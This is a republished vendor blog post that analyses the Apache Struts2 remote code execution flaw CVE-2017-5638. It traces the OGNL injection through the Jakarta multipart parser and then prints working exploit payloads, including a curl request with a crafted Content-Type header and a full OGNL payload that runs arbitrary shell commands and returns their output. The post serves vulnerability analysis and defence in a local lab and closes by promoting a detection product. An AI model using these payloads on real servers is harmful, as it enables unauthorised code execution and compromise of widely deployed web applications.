![Default self created cybersecurity insiders image low res](https://www.cybersecurity-insiders.com/wp-content/uploads/Default-self-created-cybersecurity-insiders-image-low-res-696x397.jpg)
![Default self created cybersecurity insiders image low res](https://www.cybersecurity-insiders.com/wp-content/uploads/Default-self-created-cybersecurity-insiders-image-low-res-696x397.jpg)
This post was originally published here by AJIN ABRAHAM.
A few days back Nike Zheng reported aĀ Remote Code Execution vulnerabilityĀ in Apache Struts2. The vulnerability exploits a bug in Jakarta’s Multipart parser used by Apache Struts2 to achieve remote code execution by sending a crafted Content-Type header in the request. This is a perfect example for a vulnerability in third party component. In the real word fixing this vulnerability will take considerable time as itās not feasible to write a patch for a third party module and updating to a patched version needs proper testing in multiple environments before pushing to production. This blog explains the detailed analysis of the vulnerability, exploitation and how IMMUNIO provides both detection and protection.
Detailed Vulnerability Analysis
The root cause of the vulnerability is that Apache Struts2 by default uses Jakartaās Multipart parser when the content type header is set to multipart/form-data. A crafted content type header with an OGNL expression passed into Jakartaās Multipart parser will trigger an exception which is then passed into an error message building function along with the OGNL payload. That function evaluates the OGNL expression resulting in code execution.
Letās take a detailed look into this vulnerability.
Here is a sample exploit:
%{
(#_=’multipart/form-data’).
(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(@java.lang.Runtime@getRuntime().exec(‘curl localhost:8000’))
}
If we sent a content type header like the following
Content-Type: %{(#_=’multipart/form-data’).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(@java.lang.Runtime@getRuntime().exec(‘curl localhost:8000’))}
This will hit theĀ wrapRequestĀ method present inĀ org.apache.struts2.dispatcher.DispatcherĀ class.
The payload containsĀ (#_=’multipart/form-data’)Ā which will satisfy the condition and the OGNL payload is passed into Jakartaās Multipart parser. The parser tries to parse the payload usingĀ parseĀ method inĀ org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequestĀ class.
This will result in an exception and theĀ buildErrorMessageĀ method present inĀ org.apache.struts2.dispatcher.JakartaMultiPartRequestĀ is called.
The execution will further go through couple of methods,Ā findTextĀ method callsĀ getDefaultMessageĀ which callsĀ TextParseUtil.translateVariablesĀ method that callsĀ
evaluateĀ method which will evaluate the OGNL expression in the payload.
If you consider this OGNL syntaxĀ %{ OGNL code }, anything insideĀ %{ }Ā is considered as an OGNL expression and will be evaluated by the OGNL parser.Ā ${ }Ā is also a valid expression.
In our case the following OGNL expression contains Java code that usesĀ getRuntime().exec to execute shell commands. This will be evaluated by the OGNL parser and results in code execution.
(#_=’multipart/form-data’).
(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(@java.lang.Runtime@getRuntime().exec(‘curl localhost:8000’))
Exploitation
Letās quickly set up a vulnerable Apache Struts2 web application.
We have the demo application and sample exploits hosted in our github repo:Ā https://github.com/immunio/apache-struts2-CVE-2017-5638
I have already downloaded and configured Tomcat 7 fromĀ
https://tomcat.apache.org/download-70.cgi
From apache-struts2-CVE-2017-5638 repository, copyĀ struts2-showcase-2.3.12.warĀ toĀ apache-tomcat/webapps/
Go toĀ apache-tomcat/binĀ and start the tomcat server by issuing the command
./catalina.sh start
Tomcat will automatically deployĀ struts2-showcase-2.3.12.warĀ by extracting it toĀ struts2-showcase-2.3.12Ā under webapps directory.
You can access the structs app by navigating to http://127.0.0.1:8080/struts2-showcase-2.3.12/showcase.action
Now let’s exploit this using the vanilla payload
%{(#_=’multipart/form-data’).
(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(@java.lang.Runtime@getRuntime().exec(‘curl localhost:8000’))}
The above payload is very basic and we have no way to know if the payload got executed or not.Ā
So we will use an out of band command to connect to our server. I am using the commandĀ
curl localhost:8000/apache-struts-cveĀ as it will try to connect to our server.
Letās quickly run a simple Python server.
python -m SimpleHTTPServer 8000
Letās run the exploit using curl
curl http://127.0.0.1:8080/struts2-showcase-2.3.12/showcase.action -H “Content-Type: %{(#_=’multipart/form-data’).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(@java.lang.Runtime@getRuntime().exec(‘curl localhost:8000/apache-struts-cve’))}” >/tmp/foo
Once the payload executes, we can see a GET request log in our Python server which confirms the code execution.
You can also try this out usingĀ exploit.pyĀ orĀ exploit2.pyĀ in apache-struts2-CVE-2017-5638 repository. Both scripts use similar payloads.
Also since we are testing this locally, we can use a fancy payload like this on a Mac.
python exploit.py “open /Applications/Calculator.app”
Lets use the following payload that contains Java code which will open an in memory shell, execute commands and rewrite the HTTP response object with command execution results.
%{
(#_=’multipart/form-data’).
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).
(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).
(#cmd=’whoami’).
(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).
(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).
(#p=new java.lang.ProcessBuilder(#cmds)).
(#p.redirectErrorStream(true)).
(#process=#p.start()).
(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).
(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).
(#ros.flush())
}
We will useĀ exploit3.pyĀ to demonstrate this.
Mission Accomplished!
Will IMMUNIO Protect against CVE-2017-5638?
IMMUNIOās sensors can generate a dynamic whitelist on user input to harden your application helping you to defend against code injection attacks. Here is a quick video that shows exploitation of the vulnerability and how IMMUNIOās Suspicious Header detection feature can protect against this vulnerability with zero code change.
Photo:The Economist